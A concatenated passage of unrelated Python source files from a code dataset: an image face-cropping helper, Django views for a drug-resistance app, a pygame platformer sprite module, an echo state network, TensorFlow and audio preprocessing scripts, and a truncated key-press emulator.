img = resize(img_raw,shape)\n if img.shape[0]>shape[0]:\n h0,hf = int(yc-0.5*shape[0]),int(yc+0.5*shape[0])\n h0 = max([h0,0])\n hf = min([hf,img.shape[0]])\n while hf-h0 < shape[0]:\n if hf < img.shape[0]:\n hf+=1\n else:\n h0-=1\n while hf-h0 > shape[0]:\n hf-=1\n img_ = img[h0:hf,:]\n elif img.shape[1]>shape[1]:\n w0,wf = int(xc-0.5*shape[1]),int(xc+0.5*shape[1])\n w0 = max([w0,0])\n wf = min([wf,img.shape[1]])\n while wf-w0 < shape[1]:\n if wf < img.shape[1]:\n wf+=1\n else:\n w0-=1\n while wf-w0 > shape[1]:\n wf-=1\n img_ = img[:,w0:wf]\n else:\n img_ = img\n return img_\n\ndef resize(img,shape):\n img_ = imutils.resize(img, width=shape[1])\n if img_.shape[0] < shape[0]:\n img_ = imutils.resize(img, height=shape[0])\n return img_\n\ndef find_center(img_raw,shape):\n '''\n Find the best center to crop the given image.\n If tries to detect faces, then tries to detect eyes if the image is square like.\n Finally it returns the center based on the image's aspect ratio.\n\n Parameters\n ----------\n img_raw : cv2.image\n Raw image\n shape : tuple\n Shape to crop\n\n Returns\n -------\n center : tuple\n Location of the optimum center\n '''\n img = resize(img_raw,shape)\n center=None\n \n faces_out = DetectFaces(img)\n if (len(faces_out) != 0):\n if len(faces_out) >=200:\n xc,yc = zip(*[((x+0.5*w),(y+0.5*h)) for x,y,w,h in faces_out[:50]])\n else:\n xc,yc = zip(*[((x+0.5*w),(y+0.5*h)) for x,y,w,h in faces_out])\n center=(np.mean(xc),np.mean(yc))\n\n r = img.shape[0]/float(img.shape[1])\n if (center is None)&(r < 1.1)&(r > 0.9):\n eyes_out = DetectEyes(img)\n if len(eyes_out) != 0:\n if len(eyes_out) >=200:\n xc,yc = zip(*[((x+0.5*w),(y+0.5*h)) for x,y,w,h in eyes_out[:50]])\n else:\n xc,yc = zip(*[((x+0.5*w),(y+0.5*h)) for x,y,w,h in eyes_out])\n center = (np.mean(xc),np.mean(yc))\n if r > 2:\n center = (int(0.5*img.shape[1]),int(0.15*img.shape[0]))\n else:\n center = (int(0.5*img.shape[1]),int(0.25*img.shape[0]))\n return center\n \n\ndef crop_main(img_file,path,shape):\n '''\n Crops the given image into the given shape\n\n Parameters\n ----------\n img_file : str\n Name of the image file\n path : str\n Path to the image\n shape : tuple\n Output shape\n\n Returns\n -------\n img_file : str\n Name of the image file\n img : cv2.image\n Image object that can be saved using:\n >>> cv2.imwrite(out_file,img)\n '''\n img_raw = cv2.imread(path+'/'+img_file)\n try:\n center = find_center(img_raw,shape)\n img = crop(img_raw,center,shape)\n return img_file,img\n except:\n return 'NA',None\n\n\ndef show(img,rects):\n for i,(x,y,w,h) in enumerate(rects):\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\n cv2.imshow('img',img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":6178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"549852159","text":"from pulsar import new_event_loop\nfrom pulsar.apps.test import unittest\nfrom pulsar.apps.data import create_store\n\n\ntry:\n import pymongo\n client = pymongo.MongoClient()\n alive = client.alive()\nexcept Exception:\n alive = False\n\n\n@unittest.skipUnless(alive, \"Requires pymongo and a running mongodb\")\nclass TestMongoDb(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.store = cls.create_store(loop=new_event_loop())\n\n @classmethod\n def create_store(cls, **kw):\n return create_store('mongodb://127.0.0.1:28017', **kw)\n\n def test_store(self):\n client = self.store.client()\n alive = client.alive()\n self.assertTrue(alive)\n","sub_path":"tests/stores/mongodb/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"350370348","text":"from django.shortcuts import render\nfrom django.utils import timezone\nfrom .models import Post\nfrom .models import PostSRR\nfrom django.shortcuts import render, get_object_or_404\nfrom .forms import PostForm\nfrom .forms import SrrForm\nfrom django.shortcuts import redirect\nfrom django.http import HttpResponseRedirect\nimport json\n\n# Create your views here.\n\ndef post_list(request):\n\tposts = Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')\n\n\treturn render(request, 'drug_test/post_list.html', {'posts':posts})\n\n\ndef post_detail(request, pk):\n\tpost = get_object_or_404(Post, pk=pk)\n\n\treturn render(request, 'drug_test/post_detail.html', {'post': post})\n\n\ndef post_new(request):\n\tif request.method == \"POST\":\n\t\tform = PostForm(request.POST)\n\n\t\tif form.is_valid():\n\t\t\tpost = form.save(commit=False)\n\t\t\tpost.author = request.user\n\t\t\tpost.published_date = timezone.now()\n\t\t\tpost.save()\n\n\t\treturn redirect('post_detail', pk=post.pk)\n\telse:\n\t\tform = PostForm()\n\n\treturn render(request, 'drug_test/post_edit.html', {'form': form})\n\n\ndef post_edit(request, pk):\n\tpost = get_object_or_404(Post, pk=pk)\n\tif request.method == \"POST\":\n\t\tform = PostForm(request.POST, instance=post)\n\t\tif form.is_valid():\n\t\t\tpost = form.save(commit=False)\n\t\t\tpost.author = request.user\n\t\t\tpost.published_date = timezone.now()\n\t\t\tpost.save()\n\t\t\treturn redirect('post_detail', pk=post.pk)\n\telse:\n\t\tform = PostForm(instance=post)\n\n\treturn render(request, 'drug_test/post_edit.html', {'form': form})\n\n\n\n######################################################\n## Form for entering SRR identifier\n\ndef post_srr(request):\n\tif request.method == \"POST\":\n\t\tform = SrrForm(request.POST)\n\n\t\tif form.is_valid():\n\t\t\tpost = form.save(commit=False)\n\t\t\tpost.author = request.user\n\t\t\tpost.created_date = timezone.now()\n\t\t\tpost.save()\n\n\t\treturn redirect('job_status', pk=post.pk)\n\n\telse:\n\t\tform = SrrForm()\n\n\treturn render(request, 'drug_test/job_new.html', {'form': form})\t\n\n\n\ndef update_object_status(post):\n\tpost.dataset_link = 'data/test_example.vcf'\n\tpost.save()\n\n\treturn post\n\n\ndef job_status(request, pk):\n\n\tpost = get_object_or_404(PostSRR, pk=pk)\n\n\tpost = update_object_status(post)\n\n\tif post.dataset_link != '':\n\t\treturn render(request, 'drug_test/job_finished.html', {'post': post})\n\n\n\treturn render(request, 'drug_test/job_status.html', {'post': post})\n\n\n\n\n#################\n\npath = r'/home/roma/djangoenv/drug_test/data'\nresistance_path = r'/home/roma/djangoenv/drug_test/resistance.json'\n\n\ndef get_med_resistance():\n res = json.load(open(resistance_path))\n result = {}\n for k, v in res.items():\n for v_i in v:\n result[(v_i[0], v_i[1][0], v_i[1][1])] = k\n\n return result\n\n\nMED_RESISTANCE = get_med_resistance()\n\n\ndef calc_resistance(inp_data):\n result = []\n for item in inp_data[1:]:\n curr = tuple([int(item[1])] + item[3: 5])\n if curr in MED_RESISTANCE:\n result.append(MED_RESISTANCE[curr])\n\n return result\n\n\n\ndef dst_detail(request, pk):\n\tpost = get_object_or_404(PostSRR, pk=pk)\n\n\t#filename = post.dataset_link\n\tfilename = 'test_example.vcf'\n\n\tdata = open('{}/{}'.format(path, filename)).readlines()\n\tdata = list(map(lambda x: x.split('\\t'), data[42:]))\n\tresistance_items = ', '.join(calc_resistance(data))\n\n\tdata_res = []\n\tfor item in data[1:]:\n\t\tcurr = tuple([int(item[1])] + item[3: 5])\n\t\tif curr in MED_RESISTANCE:\n\t\t\tdata_res.append(item[1:])\n\n\n\treturn render(request, 'drug_test/dst_detail.html', {'post': post, 'data': data_res, 'resistance_items': resistance_items})\n\n","sub_path":"drug_test/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"313109458","text":"n = 0\nroot = 0\nlch = []\nrch = []\n\n\ndef print_in_level():\n stack = [root]\n i = 0\n while len(stack) != 0:\n i += 1\n print('Level {:d} : '.format(i), end='')\n for each in stack[0:-1]:\n print(each, end=' ')\n print(stack[-1])\n temp = []\n for each in stack:\n if lch[each] != 0:\n temp.append(lch[each])\n if rch[each] != 0:\n temp.append(rch[each])\n stack = temp\n\n\ndef print_in_zigzag():\n stack = [root]\n i = 0\n while len(stack) != 0:\n i += 1\n if i%2 == 1:\n print('Level {:d} from left to right: '.format(i), end=' ')\n for each in stack[0:-1]:\n print(each, end=' ')\n print(stack[-1])\n else:\n print('Level {:d} from right to left: '.format(i), end=' ')\n for each in stack[::-1][0:-1]:\n print(each, end=' ')\n print(stack[0])\n temp = []\n for each in stack:\n if lch[each] != 0:\n temp.append(lch[each])\n if rch[each] != 0:\n temp.append(rch[each])\n stack = temp\n\n\nif __name__ == '__main__':\n arr = [int(i) for i in input().split()]\n n = arr[0]\n root = arr[1]\n lch = [0 for i in range(n+1)]\n rch = [0 for i in range(n+1)]\n for i in range(n):\n arr = [int(j) for j in input().split()]\n lch[arr[0]] = arr[1]\n rch[arr[0]] = arr[2]\n print_in_level()\n print_in_zigzag()\n","sub_path":"Code/CodeRecords/2304/60696/258875.py","file_name":"258875.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"108296909","text":"import os\nimport sys\nimport numpy as np \nimport matplotlib.pyplot as plt \nfrom random import shuffle\nfrom progressbar import progressbar\nimport glob\nimport librosa\n\n\n\ndataset_folder = 'audio_samples_download/samples/'\nclasses = os.listdir(dataset_folder)\n\n\ndef remove_outliers_and_too_short_files():\n for class_ in classes:\n print(class_)\n files = os.listdir(dataset_folder + class_)\n files = [os.path.join(dataset_folder, class_, file) for file in files]\n srs = []\n for file in progressbar(files):\n try:\n y, sr = librosa.load(file,sr = None)\n srs.append(sr)\n\n if len(y)/sr < 9.751:\n print(' File too short:',file)\n os.remove(file)\n except:\n print(' PROBLEM with file:',file)\n os.remove(file)\n \n u = srs == np.ones(np.shape(srs))*srs[0]\n if (np.sum(u) == len(srs)):\n print(' All samples are sampled at',srs[0],'Hz')\n else:\n print('ERROR: different sampling rates')\n\ndef standardize_file_length(duration = 9.751):\n # make all files same length\n\n dataset_folder = 'audio_samples_download/samples'\n classes = os.listdir(dataset_folder)\n\n for class_ in classes:\n files = glob.glob(os.path.join(dataset_folder, class_,'*.wav'))\n for file in progressbar(files):\n y, sr = librosa.load(file,sr = None,duration = duration)\n librosa.output.write_wav(file, y, 16000)\n ","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"650771307","text":"import random\n\nimport pygame\nfrom pygame.math import Vector2\n\nimport settings\nfrom sprite.items import Carrot, Jetpack\n\n\nclass LivingBeing(pygame.sprite.Sprite):\n \"\"\"Describes common behavior and attributes between living beings.\n\n Attributes:\n image_names (list): List of image names that\n will be render inside the sprite.\n \"\"\"\n\n image_names = []\n\n def __init__(self, game, images, pos, groups):\n \"\"\"\n Args:\n game (Game): A reference for the running game.\n image (pygame.Surface): Image surface loaded via pygame.image.load.\n pos (tuple): X and Y axis positions where the sprite will be draw.\n groups (list): A list of pygame.sprite.Group.\n \"\"\"\n super(LivingBeing, self).__init__(groups)\n self._image_frames(images)\n self.game = game\n self.image = images[0]\n self.rect = self.image.get_rect()\n self.rect.x, self.rect.y = pos\n self.last_update = 0\n\n def _image_frames(self, images):\n \"\"\"Save image list.\n Override this method in order to give some context to the images.\"\"\"\n self.image_frames = images\n\n @classmethod\n def new(cls, game, **kwargs):\n \"\"\"Create a new instance of the living being.\n\n Args:\n game (Game): A reference for the running game.\n \"\"\"\n images = [game.spritesheet.get_image(i) for i in cls.image_names]\n return cls(game, images, **kwargs)\n\n\nclass Player(LivingBeing):\n \"\"\"\n Attributes:\n _layer (int): The layer where the player will be draw.\n image_names (list): List of Bunny image names.\n \"\"\"\n\n _layer = settings.PLAYER_LAYER\n image_names = [\n \"bunny1_stand.png\",\n \"bunny1_ready.png\",\n \"bunny1_jump.png\",\n \"bunny1_hurt.png\",\n \"bunny1_walk1.png\",\n \"bunny1_walk2.png\",\n ]\n\n def __init__(self, game, images, pos=(0, 0), groups=[]):\n \"\"\"\n Args:\n game (Game): A reference for the running game.\n images (list): List of image surfaces loaded via pygame.image.load.\n pos (tuple): X and Y axis positions where the Player will be draw.\n groups (list): A list of pygame.sprite.Group.\n \"\"\"\n super(Player, self).__init__(game, images, pos, groups)\n self.walking = False\n self.jumping = False\n self.boosted = False\n self.alive = True\n self.score = 0\n self.current_frame = 0\n self.pos = Vector2(self.rect.x, self.rect.y)\n self.vel = Vector2(0, 0)\n self.acc = Vector2(0, 0)\n\n def _image_frames(self, images):\n \"\"\"Organize image frames in a dictionary.\n\n Args:\n images (list): List of image surfaces loaded via pygame.image.load.\n \"\"\"\n self.image_frames = {\n \"jump\": images[2],\n \"hurt\": images[3],\n \"stand\": images[:2],\n \"walkr\": images[4:],\n \"walkl\": [],\n }\n\n for frame in self.image_frames[\"walkr\"]:\n self.image_frames[\"walkl\"].append(\n pygame.transform.flip(frame, True, False)\n )\n\n def standing(self):\n \"\"\"Check if the player is standing over a platform.\"\"\"\n if self.vel.y > 0 and self.alive:\n hits = pygame.sprite.spritecollide(\n self, self.game.platforms, False\n )\n if hits:\n lowest = hits[0]\n for hit in hits:\n if hit.rect.bottom > lowest.rect.bottom:\n lowest = hit\n if (\n self.pos.x < lowest.rect.right + 10\n and self.pos.x > lowest.rect.left - 10\n ):\n if self.pos.y < lowest.rect.centery:\n self.pos.y = lowest.rect.top\n self.vel.y = 0\n self.jumping = False\n self.boosted = False\n\n def walk(self):\n \"\"\"Move the player backwards/forwards if an arrow key was pressed.\"\"\"\n key = pygame.key.get_pressed()\n if key[pygame.K_LEFT]:\n self.acc.x = -settings.PLAYER_ACC\n if key[pygame.K_RIGHT]:\n self.acc.x = settings.PLAYER_ACC\n\n # apply friction\n self.acc.x += self.vel.x * settings.PLAYER_FRICTION\n\n # motion equation\n self.vel += self.acc\n if abs(self.vel.x) < 0.1:\n self.vel.x = 0\n self.pos += self.vel + settings.PLAYER_ACC * self.acc\n\n # wrap around the sides of the screen\n if self.pos.x > settings.WIDTH + (self.rect.width / 2):\n self.pos.x = 0 - (self.rect.width / 2)\n if self.pos.x < 0 - (self.rect.width / 2):\n self.pos.x = settings.WIDTH + (self.rect.width / 2)\n\n # update walking status according to the x speed\n if self.vel.x != 0:\n self.walking = True\n else:\n self.walking = False\n\n def jump(self):\n \"\"\"Perform a jump.\"\"\"\n self.rect.y += 2\n hits = pygame.sprite.spritecollide(self, self.game.platforms, False)\n self.rect.y -= 2\n if hits and not self.jumping:\n self.jumping = True\n self.vel.y = settings.PLAYER_STRENGTH\n self.game.jump_sound.play()\n\n def cut_jump(self):\n \"\"\"Shrink the jump.\"\"\"\n if self.jumping and not self.boosted:\n if self.vel.y < -6:\n self.vel.y = -6\n\n def hit_item(self):\n \"\"\"Check if the player hitted an item.\"\"\"\n if self.alive:\n for hit in pygame.sprite.spritecollide(\n self, self.game.items, True\n ):\n if isinstance(hit, Carrot):\n self.game.stage_clear()\n break\n elif isinstance(hit, Jetpack):\n self.boosted = True\n self.vel.y = settings.BOOST_POWER\n self.game.powerup_sound.play()\n\n def hit_spring(self):\n \"\"\"Check if the player hitted an spring.\"\"\"\n if self.alive:\n for hit in pygame.sprite.spritecollide(\n self, self.game.springs, False\n ):\n if not hit.fired:\n edges = [\n self.rect.bottom\n in range(hit.rect.top, hit.rect.top + 10),\n self.pos.x > (hit.rect.left - 10),\n self.pos.x < (hit.rect.right + 10),\n ]\n if all(edges):\n hit.fired = True\n self.boosted = True\n self.vel.y = settings.BOOST_SPRING\n self.game.spring_sound.play()\n break\n\n def hit_enemy(self):\n \"\"\"Check if the player hitted a enemy.\"\"\"\n if self.alive:\n for hit in pygame.sprite.spritecollide(\n self, self.game.enemies, False, pygame.sprite.collide_mask\n ):\n self.alive = False\n self.game.death_sound.play()\n\n def animate(self):\n \"\"\"Switch between image frames.\"\"\"\n now = pygame.time.get_ticks()\n\n if not self.alive:\n if now - self.last_update > 100:\n self.last_update = now\n bottom = self.rect.bottom\n self.image = self.image_frames[\"hurt\"]\n self.rect = self.image.get_rect()\n self.rect.bottom = bottom\n\n elif self.jumping or self.boosted:\n if now - self.last_update > 100:\n self.last_update = now\n bottom = self.rect.bottom\n self.image = self.image_frames[\"jump\"]\n self.rect = self.image.get_rect()\n self.rect.bottom = bottom\n\n elif self.walking:\n if now - self.last_update > 180:\n self.last_update = now\n self.current_frame = (self.current_frame + 1) % 2\n bottom = self.rect.bottom\n direction = \"walkr\" if self.vel.x > 0 else \"walkl\"\n self.image = self.image_frames[direction][self.current_frame]\n self.rect = self.image.get_rect()\n self.rect.bottom = bottom\n\n elif not self.jumping and not self.walking:\n if now - self.last_update > 250:\n self.last_update = now\n self.current_frame = (self.current_frame + 1) % 2\n bottom = self.rect.bottom\n self.image = self.image_frames[\"stand\"][self.current_frame]\n self.rect = self.image.get_rect()\n self.rect.bottom = bottom\n\n # update sprite mask\n self.mask = pygame.mask.from_surface(self.image)\n\n def update(self):\n \"\"\"Check if the player is alive and perform\n all animations like walking, jumping, etc.\"\"\"\n\n # reset acceleration and gravity values\n self.acc = Vector2(0, settings.GRAVITY)\n\n # test if the player collided with any platform\n self.standing()\n\n # move left or right according to players command\n self.walk()\n\n # check for poweups\n self.hit_item()\n\n # check for springs\n self.hit_spring()\n\n # check if hit a mob\n self.hit_enemy()\n\n # animate player sprite\n self.animate()\n\n # update player position\n self.rect.midbottom = self.pos\n\n # when player gets close to the top initiate the view scrolling\n if self.rect.top <= settings.HEIGHT / 4:\n amount = max(abs(self.vel.y), 2)\n self.pos.y += amount\n self.game.scroll(amount)\n\n # if the player falls the game is over\n if self.rect.bottom > settings.HEIGHT:\n self.game.over()\n\n\nclass Enemy(LivingBeing):\n \"\"\"Describes common behavior and attributes between enemies.\n\n Attributes:\n _layer (int): The layer where the enemy will be draw.\n \"\"\"\n\n _layer = settings.ENEMIES_LAYER\n\n def __init__(self, *args, **kwargs):\n super(Enemy, self).__init__(*args, **kwargs)\n\n\nclass FlyMan(Enemy):\n \"\"\"A flying enemy with a propeller in the head.\n This enemy crosses the screen horizontally in a random speed.\n\n Attributes:\n image_names (list): List of FlyMan image names.\n \"\"\"\n\n image_names = [\n \"flyMan_fly.png\",\n \"flyMan_jump.png\",\n \"flyMan_stand.png\",\n \"flyMan_still_fly.png\",\n \"flyMan_still_jump.png\",\n \"flyMan_still_stand.png\",\n ]\n\n def __init__(self, game, images, pos, groups):\n \"\"\"\n Args:\n images (list): List of image surfaces loaded via pygame.image.load.\n pos (tuple): X and Y axis positions where the FlyMan will be draw.\n groups (list): A list of pygame.sprite.Group.\n \"\"\"\n super(FlyMan, self).__init__(game, images, pos, groups)\n self.vx = random.randrange(1, 4)\n self.vy = 0\n self.dy = 0.5\n\n # if it starts on the right side of the screen\n if self.rect.x > settings.WIDTH / 2:\n self.vx *= -1 # invert direction\n\n def update(self):\n \"\"\"Move FlyMan or kill it if leaves the screen.\"\"\"\n self.rect.x += self.vx\n self.vy += self.dy\n self.rect.y += self.vy\n\n # switch direction on Y axis if reached the boundaries\n if self.vy > 3 or self.vy < -3:\n self.dy *= -1\n\n if (\n self.rect.left > settings.WIDTH + 100\n or self.rect.right < -100\n or self.rect.top >= settings.HEIGHT\n ):\n self.kill()\n else:\n self.animate()\n\n def animate(self):\n \"\"\"Switch between image frames.\"\"\"\n now = pygame.time.get_ticks()\n\n if now - self.last_update > settings.FPS:\n self.last_update = now\n center = self.rect.center\n if self.dy < 0: # going up\n if self.image == self.image_frames[0]:\n self.image = self.image_frames[3]\n else:\n self.image = self.image_frames[0]\n else: # going down\n if self.image == self.image_frames[1]:\n self.image = self.image_frames[4]\n else:\n self.image = self.image_frames[1]\n self.rect = self.image.get_rect()\n self.mask = pygame.mask.from_surface(self.image)\n self.rect.center = center\n","sub_path":"sprite/living.py","file_name":"living.py","file_ext":"py","file_size_in_byte":12544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"328269411","text":"\n'''\nVery simple neural network that identifies if the three numbers are high or low.\nlabels has 2 values, for low (0) and high (1)\n'''\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# Imports\nimport numpy as np\nimport tensorflow as tf\n\n\n# just 2 test datas\ndata = np.array([\n [1.0, 1.0, 1.0],\n [0.0, 0.0, 0.0]\n])\n\n# labels or the correct answers of the test datas\nlabels = np.array([[0.0,1.0],[1.0,0.0]])\n\n\n# input - None is for batch, 3 is for number of input per batch\nx = tf.placeholder(tf.float32, [None,3])\nw = tf.Variable(tf.zeros([3,2])) # create 3 weights (1 for each input) for 2 neurons\nb = tf.Variable(tf.zeros([2])) # create a bias for each neuron. This is just another weight that we do not matmul with the input\n\n# initialize the variables defined above\ninit = tf.initialize_all_variables()\n\n# model using softmax activation function. Formula is always input * weights + bias then feed to the activation\nm = tf.nn.softmax(tf.matmul(x, w) + b)\n\n# labes or correct answers\ny = tf.placeholder(tf.float32, [None, 2])\n\n# calculate the loss distance using cross entropy\ncross_entropy = -tf.reduce_sum(y * tf.log(m))\n\n# check if highest probability is the same as correct answers\nis_correct = tf.equal(tf.argmax(m,1), tf.argmax(y, 1))\naccuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))\n\noptimizer = tf.train.GradientDescentOptimizer(0.003)\ntrain_step = optimizer.minimize(cross_entropy)\n\nsess = tf.Session()\nsess.run(init)\n\nfor i in range(1000):\n\ttrain_data = {x: data, y: labels}\n\ta,c = sess.run([accuracy, cross_entropy], feed_dict=train_data)\n\tsess.run(train_step, feed_dict=train_data)\n\n\tif (0 == i % 100):\n\t\ta,c = sess.run([accuracy, cross_entropy], feed_dict=train_data)\n\t\tprint(a,c)\n\nr = sess.run(m, feed_dict=train_data)\nprint(r)","sub_path":"03_color_temp.py","file_name":"03_color_temp.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"256978894","text":"import numpy as np\nfrom numpy.core._multiarray_umath import dot, square, tanh\n# from sklearn.metrics import mean_squared_error\nfrom math import sqrt\n\n# TODO: added matplotlib\nimport matplotlib.pyplot as plt\n\n\n###########\n# CLASSES #\n###########\n\nclass EchoStateNetwork:\n def __init__(self, input, res, outputsize):\n self.input = input\n self.res = res\n self.outputsize = outputsize\n\n # TODO: changed weights initialization to half standard normal and\n # removed bias\n\n self.inputweights = np.random.randn(input, res) * 0.25\n self.reservoirweights = np.random.randn(res, res) * 0.25\n self.outputweights = np.random.randn(res, outputsize) * 0.25\n # self.outputweights = np.random.randn(res+1, output) * 0.25\n\n\n\n\n # TODO: changed output initialization and input size of activities\n self.output = np.zeros((1, outputsize))\n self.activ = np.zeros((outputsize, res))\n # self.activ = np.zeros((1, res+1))\n\n def forwardPass(self, reservoir_input):\n\n # TODO: changed forward pass computation\n\n # Compute the input that is fed into the reservoir\n external_input = reservoir_input * self.inputweights\n\n # Get the recurrent input to the reservoir\n recurrent_input = self.activ[0, :self.res]\n\n\n # Compute the reservoir activity based on the reservoir input and the\n # recurrent reservoir activity (from the previous time step)\n res_act = np.tanh(\n external_input + np.matmul(recurrent_input, self.reservoirweights)\n )\n \n # bias\n # one = np.array([[1]])\n # res_act = np.concatenate((res_act, one), axis=1)\n\n # Update the ESN's reservoir activity\n self.activ = res_act\n\n\n # Compute the output of the ESN\n network_output = np.matmul(res_act, self.outputweights)\n\n # Update the ESN's output\n self.output = network_output\n\n\n def reset(self):\n # TODO: changed the dimensionality of the activity\n self.activ = np.zeros((self.outputsize, self.res))\n\n def oscillator(self):\n self.forwardPass(self.output)\n\n def teacherForcing(self, target):\n self.output = target\n \n def train(self, seq, washout, training, test):\n\n self.reset\n\n # Washout\n for i in range(washout):\n\n # TODO: changed order of teacher forcing and oscillator call\n\n self.oscillator()\n self.teacherForcing(seq[i])\n\n # TODO: renamed a to activities and removed b # to training_sequence\n\n activities = np.zeros((training, self.res))\n # activities = np.zeros((training, self.res+1))\n\n training_sequence = np.zeros((training, self.outputsize))\n\n\n # TODO: renamed c to net_out\n net_out = np.zeros((training, self.outputsize))\n\n # Training\n for i in range(washout, washout + training):\n self.oscillator()\n\n # TODO: since output and activity dimensionalities have been\n # changed (see __init__ and forwardPass), these line were\n # adapted accordingly\n\n # net_out[i-washout] = self.output\n\n net_out[i - washout, 0] = self.output\n\n activities[i - washout] = self.activ\n\n self.teacherForcing(seq[i])\n training_sequence[i-washout] = seq[i]\n\n # TODO: changed rms\n rms = my_rmse(net_out=net_out[:, 0],\n target=seq[washout:training + washout])\n\n print('RMSE1 = ' + str(rms))\n\n # Perform pseudo matrix inversion of the recorded reservoir activities\n # to calculate output weights according to\n # W_out * activities = net_out\n # W_out = net_out * pinv(activities)\n\n inv_activities = np.linalg.pinv(activities)\n\n\n # TODO: changed output weight calculation slightly\n # self.outputweights = np.dot(np.linalg.pinv(activities), training_sequence)\n # Compute the output weights\n\n self.outputweights = np.matmul(inv_activities, training_sequence)\n \n\n # Test\n for i in range(washout+test, washout + training+test):\n\n\n self.oscillator()\n\n # TODO: again, output size was adapted\n # net_out[i-washout-200] = self.output\n net_out[i-washout-test, 0] = self.output\n\n # TODO: actually, testing should work without teacher forcing...\n self.teacherForcing(seq[i])\n\n # TODO: changed rms\n rms = my_rmse(net_out=net_out[:, 0],\n target=seq[washout + test:training + washout + test])\n\n print('RMSE2 = ' + str( rms ))\n\n # self.outputweights = dot( dot(np.ravel(b),a), np.linalg.inv( dot(a,a_T) + \\\n # reg*np.eye(200) ) )\n\n # self.outputweights = np.dot(np.dot(np.linalg.inv(np.dot(a.T, a) + reg * np.eye(self.res+1)), a.T), b)\n\n self.reset()\n\n # Washout\n for i in range(washout):\n\n # TODO: again changed order of teacher forcing and oscillator call\n\n self.oscillator()\n self.teacherForcing(seq[i])\n\n # TODO: as above, renamed c to net_out\n net_out = np.zeros((test, self.outputsize))\n\n\n # test\n for i in range(washout, washout + test):\n self.oscillator()\n # TODO: again net_output dimension was changed\n # net_out[i-washout] = self.output\n net_out[i - washout, 0] = self.output\n\n # TODO: actually, testing should work without teacher forcing...\n # self.teacherForcing(seq[i])\n\n # Briefly visualize performance\n plt.plot(range(test), seq[washout: washout + test], label=\"Target\")\n plt.plot(range(test), net_out[:, 0], linestyle=\"dashed\", color=\"red\",\n label=\"Network output\")\n plt.legend()\n plt.show()\n\n\n # TODO: changed rms\n rms = my_rmse(net_out=net_out[:, 0],\n target=seq[washout:test + washout])\n\n print('RMSE = ' + str(rms))\n\n\n#############\n# FUNCTIONS #\n#############\n\ndef my_rmse(net_out, target):\n \"\"\"\n This function calculates the root mean squared error for a given network\n output and target\n \"\"\"\n\n # Get the length of the sequence\n seq_len = len(net_out)\n\n # Root mean square error calculation\n rmse = np.sqrt((1 / seq_len) * np.sum(np.square(net_out - target)))\n\n return rmse\n\n\n##########\n# SCRIPT #\n##########\n\nseq = np.array\nseq = np.loadtxt(\"sequence.txt\")\n\n\n\n\nfs = 700 # sample rate \nf = 20 # the frequency of the signal\n\nx = np.arange(fs) # the points on the x axis for plotting\n# compute the value (amplitude) of the sin wave at the for each sample\ny = np.sin(2*np.pi*f * (x/fs)) \n\n\nsin = np.sin(y)\n\n\nesn = EchoStateNetwork(1, 10, 1)\nesn.train(sin, 100, 400, 200)\n","sub_path":"EchoStateNetwork.py","file_name":"EchoStateNetwork.py","file_ext":"py","file_size_in_byte":6854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"266414416","text":"import sys\nsys.path.insert(0, '/home/vagrant/twosixcapital/gspread')\n\nimport pandas as pd\nimport numpy as np\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom oauth2client import tools\nimport pdb\n\nSCOPE = 'https://spreadsheets.google.com/feeds'\n\ndef get_credentials():\n return ServiceAccountCredentials.from_json_keyfile_name('test-spreadsheet.json', SCOPE)\n\ndef df_to_sheets(df, spreadsheet_id, worksheet_id, column_header=True, row_header=True):\n\n gc = gspread.authorize(get_credentials())\n wks = getattr(gc.open(spreadsheet_id), worksheet_id.lower())\n\n to_write = [x.split('|') for x in df.to_csv(sep='|').split('\\n')[:-1]]\n max_cell = wks.get_addr_int(len(to_write), len(to_write[0]))\n cell_range = wks.range('A1:{}'.format(max_cell))\n cell_arr = np.array(cell_range).reshape(len(to_write), len(to_write[0]))\n\n for row in range(len(cell_arr)):\n for col in range(len(cell_arr[0])):\n cell_arr[row, col].value = to_write[row][col]\n\n wks.update_cells(list(cell_arr.flatten()))\n\n\nif __name__ == '__main__':\n df = pd.DataFrame([[1,2,3], [4,5,6]], columns=['a', 'b', 'c']).set_index(['a', 'b'])\n df.columns = [['d'], df.columns]\n\n df_to_sheets(df, 'test', 'Sheet1')","sub_path":"sheets.py","file_name":"sheets.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"140842535","text":"\"\"\" \n\nExecutes the command sent to the program as per the\ndefined key map.\n\n\"\"\"\n\nimport os\nimport sys\nimport time\nfrom scankeys import PressKey, ReleaseKey\n\nscan_key_map = {\n\t'up': 0xC8,\n 'left': 0xCB,\n 'right': 0xCD,\n 'down': 0xD0,\n\n 'a': 0x1E,\n 'b': 0x30,\n\n 'start': 0x1F,\n 'select': 0x12\n}\n\ndef main(args):\n\tkey = args[0]\n\n\tif key in 